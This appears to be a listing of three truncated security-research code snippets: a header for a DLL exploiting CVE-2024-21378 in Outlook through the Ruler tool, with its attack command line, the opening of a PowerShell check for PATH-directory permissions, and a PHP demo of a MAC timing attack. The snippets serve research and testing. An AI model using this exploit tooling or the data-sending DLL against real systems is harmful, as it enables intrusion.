Homer28

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and

wdormann

If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
    Break
}

$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
    # This prints a table of ACLs
    # get-acl $path | %{ $_.Access  } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights

defuse

<?php

/*
 * This code is copied from 
 * http://www.warpconduit.net/2013/04/14/highly-secure-data-encryption-decryption-made-easy-with-php-mcrypt-rijndael-256-and-cbc/
 * to demonstrate an attack against it. Specifically, we simulate a timing leak
 * in the MAC comparison which, in a Mac-then-Encrypt (MtA) design, we show
 * breaks confidentiality.
 *
 * Slight modifications such as making it not serialize/unserialize and removing